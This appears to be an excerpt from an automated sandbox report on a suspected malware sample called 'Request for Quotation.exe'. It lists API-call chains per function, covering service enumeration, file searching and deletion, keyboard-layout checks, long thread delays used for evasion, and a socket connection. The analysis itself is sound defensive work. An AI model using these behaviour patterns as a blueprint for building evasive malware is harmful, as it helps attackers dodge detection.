1_2_004113C9
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@
QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,1_1_004113C9
          Source: C:\Users\user\Desktop\Request for Quotation.exe Window / User API: threadDelayed 709
          Source: C:\Users\user\Desktop\Request for Quotation.exe TID: 6012 Thread sleep count: 709 > 30
          Source: C:\Users\user\Desktop\Request for Quotation.exe TID: 6012 Thread sleep time: -7090000s >= -30000s
          Source: C:\Users\user\Desktop\Request for Quotation.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 1_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040517Bh
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 1_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040517Bh
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 1_1_00405156 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040517Bh
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 1_1_00405156 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040517Bh
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 0_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A15
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 0_2_004065C1 FindFirstFileA,FindClose,0_2_004065C1
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?
$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,1_2_00404C0A
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,1_2_0040751B
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits
@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr1_2_00410586
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@
@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,1_2_0040728F
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$cha
r_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE1_2_0040477E
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,1_2_00403325
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 1_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,1_2_00412BEE
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?
$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,1_1_00404C0A
